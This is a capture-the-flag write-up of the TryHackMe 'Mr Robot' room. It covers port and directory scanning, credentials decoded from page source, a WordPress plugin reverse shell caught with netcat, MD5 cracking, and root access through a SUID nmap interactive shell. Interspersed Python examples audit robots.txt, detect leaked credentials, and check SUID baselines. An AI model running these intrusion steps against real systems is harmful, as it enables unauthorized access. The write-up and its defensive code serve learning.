TryHackMe | MrRobot
After the relative success of the previous room I completed on TryHackMe, it was time to try something slightly more challenging. I really enjoyed watching the show Mr. Robot last year, so when I saw a Mr Robot themed room of medium difficulty, I thought this was the perfect one to try.
Objective
The goal was simple, to find the 3 hidden keys on the machine. There was no mention of a user.txt or root.txt this time, but it was a safe assumption that at least one of the keys would require some form of privileged access to obtain.
Initial Reconnaissance
Port Scanning
As is becoming somewhat of a pattern, I began by running a port scan against the machine, to find out what services were running. The results showed that there wasn't much other than a web server running.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 16:06 CET
Nmap scan report for 10.10.149.92
Host is up (0.041s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
Hidden Directory Searching
There's a web server running, which I already knew, since my gobuster command had started finding directories. It found quite a lot of interesting stuff, most notably a WordPress instance.
┌──(gareth㉿SRF239-L)-[~/Desktop]
└─$ gobuster dir -u http://10.10.149.92 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.149.92
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/04 16:09:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/admin (Status: 301)
/atom (Status: 301)
/audio (Status: 301)
/blog (Status: 301)
/css (Status: 301)
/dashboard (Status: 302)
/favicon.ico (Status: 200)
/feed (Status: 301)
/images (Status: 301)
/image (Status: 301)
/Image (Status: 301)
/index.html (Status: 200)
/index.php (Status: 301)
/intro (Status: 200)
/js (Status: 301)
/license (Status: 200)
/login (Status: 302)
/page1 (Status: 301)
/phpmyadmin (Status: 403)
/readme (Status: 200)
/rdf (Status: 301)
/robots (Status: 200)
/robots.txt (Status: 200)
/rss (Status: 301)
/rss2 (Status: 301)
/sitemap (Status: 200)
/sitemap.xml (Status: 200)
/video (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-config (Status: 200)
/wp-cron (Status: 200)
/wp-links-opml (Status: 200)
/wp-load (Status: 200)
/wp-login (Status: 200)
/wp-signup (Status: 302)
===============================================================
2021/01/04 16:18:37 Finished
===============================================================
Needless to say, I spent a bit of time manually navigating to these directories. Most of them didn't really contain anything. It was fun though to browse through the website and see the Mr. Robot related text and apps that appeared.
Finding the Keys
Key 1 of 3
Among the files found was a robots.txt, which is always interesting to take a look at, to see if there's anything specific the admin didn't want search engines to index. As it happens, there was a file called key-1-of-3.txt. Navigating to this file in the browser led me to the first key.
Also listed in this robots.txt file was another file, called fsocity.dic (this was probably supposed to be fsociety.dic). I downloaded this file and opened it. It appeared to be a password list for something.
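The robots.txt lesson above is worth turning into a check. The following is an added example, not code from the write-up or the room: it parses a constructed robots.txt (modelled on the one described, with bare filenames alongside ordinary directives) and flags any Disallow target or stray line whose name suggests a key, password list, backup or dump, since listing such a path in robots.txt advertises it rather than protecting it.

```python
import re
from typing import List, Tuple

# Constructed robots.txt modelled on the one described in the write-up
# (two bare filenames plus ordinary directives); not the room's real file.
SAMPLE_ROBOTS = """User-agent: *
fsocity.dic
key-1-of-3.txt
Disallow: /wp-admin/
Disallow: /backup/   # old site copy
Sitemap: http://10.10.149.92/sitemap.xml
"""

# "Name: value" directive; anything else is a bare (non-standard) line.
DIRECTIVE = re.compile(r"^([A-Za-z-]+)\s*:\s*(.*)$")
# Names and extensions that should never be advertised in robots.txt.
SENSITIVE = re.compile(r"(key|passw|secret|backup|dump|\.(dic|sql|bak|zip|gz|old|env)$)", re.I)


def parse_robots(text: str) -> List[Tuple[str, str]]:
    """Return (directive, value) pairs in file order.
    Lines without a 'Name:' prefix come back as ('bare', line):
    crawlers ignore them, but a human reading the file does not."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        m = DIRECTIVE.match(line)
        if m:
            entries.append((m.group(1).lower(), m.group(2).strip()))
        else:
            entries.append(("bare", line))
    return entries


def sensitive_paths(text: str) -> List[str]:
    """Disallow targets and bare lines whose names suggest keys,
    password lists, backups or dumps: disclosure, not protection."""
    return [value for name, value in parse_robots(text)
            if name in ("disallow", "bare") and SENSITIVE.search(value)]


if __name__ == "__main__":
    for path in sensitive_paths(SAMPLE_ROBOTS):
        print("review:", path)
```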
Key 2 of 3
After inspecting the /license directory, I was presented with a message on the website which said:
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
Upon inspecting the source code for this page, I found what appeared to be a base64-encoded string: ZWxsaW90OkVSMjgtMDY1Mgo=
┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot]
└─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652
With these credentials, I was able to log in to the admin panel of the WordPress site located at http://10.10.149.92/wp-login.php.
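Credentials left in page source in base64 are a finding a reviewer should be able to catch before an attacker does. This added example (not from the write-up) scans a constructed HTML fragment containing the token quoted above, strictly decodes every base64-looking run, and reports those that decode to a user:password pair; note that the real token decodes with a trailing newline, which the strip() handles.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed page source; the base64 token is the one quoted in the write-up.
SAMPLE_HTML = """<html><body>
<p>what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?</p>
<!-- ZWxsaW90OkVSMjgtMDY1Mgo= -->
<script src="/js/app.min.js?v=aGVsbG8="></script>
</body></html>
"""

# A run of 12+ base64 characters plus optional padding, not glued to more base64 chars.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")
# Decoded text shaped like "username:password".
CRED = re.compile(r"^([A-Za-z0-9._-]{1,64}):(\S{1,128})$")


def decode_token(token: str) -> Optional[str]:
    """Strictly decode one token; None unless it is valid base64 that yields printable ASCII."""
    try:
        raw = base64.b64decode(token, validate=True)  # ValueError on bad chars or padding
    except ValueError:
        return None
    try:
        text = raw.decode("ascii").strip()  # the real token ends in "\n"
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_credentials(html: str) -> List[Tuple[str, str]]:
    """Every base64-looking token in the source that decodes to user:password."""
    hits = []
    for token in B64_TOKEN.findall(html):
        text = decode_token(token)
        if text is None:
            continue
        m = CRED.match(text)
        if m:
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for user, _ in find_credentials(SAMPLE_HTML):
        print("credential in page source for user:", user)
```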
I then used this access to upload a new WordPress plugin, which contained a reverse shell to my machine. I set up a listener with netcat and proceeded to activate the plugin.
┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.145.210] from (UNKNOWN) [10.10.149.92] 33519
bash: cannot set terminal process group (1755): Inappropriate ioctl for device
bash: no job control in this shell
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$
Success. Now to find the key-2-of-3.txt file. A quick find command to locate the file and an ls -la revealed that the file is owned by the robot user. I was currently logged in as a user called daemon, so I needed to switch users somehow.
I changed directory to /home/robot and managed to find a file called password.raw-md5.
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
I put this hash into crackstation.net, which immediately returned the plaintext password; this allowed me to switch to the robot user and get the 2nd key.
daemon@linux:/home/robot$ su robot
Password:
robot@linux:~$ cat key-2-of-3.txt
<redacted>
robot@linux:~$
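Why did crackstation answer instantly? The hash above is an unsalted MD5, and its preimage happens to be the RFC 1321 MD5 test vector, so it sits in every lookup table. This added example (not from the write-up) shows the dictionary attack against a constructed mini wordlist standing in for fsocity.dic, and beside it the storage format that would have defeated it: salted, iterated PBKDF2-HMAC-SHA256, where two records for the same password differ and each guess costs the full work factor.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# The hash from the write-up. Its preimage is the RFC 1321 MD5 test vector
# "abcdefghijklmnopqrstuvwxyz", which is why a lookup table answers instantly.
FOUND_HASH = "c3fcd3d76192e4007dfb496cca67e13b"

# Constructed mini wordlist standing in for fsocity.dic.
WORDLIST = ["password", "fsociety", "abcdefghijklmnopqrstuvwxyz", "mrrobot"]


def crack_md5(target_hex: str, words: Iterable[str]) -> Optional[str]:
    """Unsalted MD5: one cheap hash per candidate, and one table serves every user."""
    target = target_hex.lower()
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def store_password(password: str, iterations: int = 600_000) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256; the record carries its own parameters."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute from the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("md5 dictionary hit:", crack_md5(FOUND_HASH, WORDLIST))
    rec = store_password("abcdefghijklmnopqrstuvwxyz")
    print("pbkdf2 record:", rec)
    print("verify ok:", verify_password("abcdefghijklmnopqrstuvwxyz", rec))
```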
Key 3 of 3
Now to find the final key. For this, I needed root permissions on the box. A quick scan for any binary files with the SUID bit set which I could exploit returned the following list. See if you can spot the one I exploited.
I ran the nmap binary in interactive mode and then from there spawned a shell. Since this binary was given permission to run as the root user, my shell was also running as root. This then allowed me to capture the 3rd and final key.
robot@linux:~$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# cat /root/key-3-of-3.txt
<redacted>
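From the defender's side, the SUID step above is caught by comparing the box's setuid binaries against a baseline. This added example (not from the write-up) parses a constructed find/ls -l listing in the shape the room would produce and flags any SUID-root binary that is either not a stock Debian/Ubuntu setuid program or lives outside package-managed directories; the baseline set and the directory list are assumptions for the example, and the sizes and dates are illustrative.

```python
from typing import List

# Constructed listing in the shape of
#   find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null
# on a Debian/Ubuntu-style host; sizes and dates are illustrative.
SAMPLE_FIND = """-rwsr-xr-x 1 root root  44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root  40128 Mar  8  2020 /bin/su
-rwsr-xr-x 1 root root  40432 Mar  8  2020 /bin/mount
-rwsr-xr-x 1 root root  53240 Mar  8  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Mar  8  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 780672 Jun 11  2015 /usr/local/bin/nmap
"""

# Basenames that are SUID root on a stock Debian/Ubuntu install and have a
# reason to be. Anything else needs a written justification or the bit removed.
BASELINE = {"passwd", "su", "sudo", "mount", "umount", "ping", "ping6",
            "chsh", "chfn", "gpasswd", "newgrp", "pkexec", "fusermount"}
PACKAGE_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")


def suid_binaries(listing: str) -> List[str]:
    """Paths from ls -l lines owned by root whose owner-execute slot is 's' or 'S' (setuid)."""
    paths = []
    for line in listing.splitlines():
        fields = line.split(None, 8)  # mode links owner group size mon day year path
        if len(fields) < 9:
            continue
        mode, owner, path = fields[0], fields[2], fields[8]
        if len(mode) >= 4 and mode[3] in "sS" and owner == "root":
            paths.append(path)
    return paths


def unexpected_suid(listing: str) -> List[str]:
    """SUID-root binaries not in the baseline, or living outside package-managed dirs."""
    flagged = []
    for path in suid_binaries(listing):
        name = path.rsplit("/", 1)[-1]
        if name not in BASELINE or not path.startswith(PACKAGE_DIRS):
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    for path in unexpected_suid(SAMPLE_FIND):
        print("unexpected SUID root binary:", path)
```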
Stabilizing the Shell
After doing a few of these CTF rooms now, I have gotten into the habit of using Python to stabilize my shell. The shell you get with netcat does not come with many nice features, like the ability to clear the screen, or autocomplete. In order to stabilize the shell, I first check if python is installed by doing python3 --version. If it is installed, I then do the following to spawn a more stable shell.
When I am finished with the room and I exit back out to my host machine, I type reset and press return to set my own local shell back to its defaults.
Review
A good mixture of expertise was required to crack this one: a bit of hash cracking, a bit of web-based searching, some decoding, WordPress "exploiting" and a bit of privilege escalation at the end taking advantage of SUID.
I enjoyed this box because of the theme and also because of its challenging nature. I hope I'm able to find and complete another medium box like it again soon.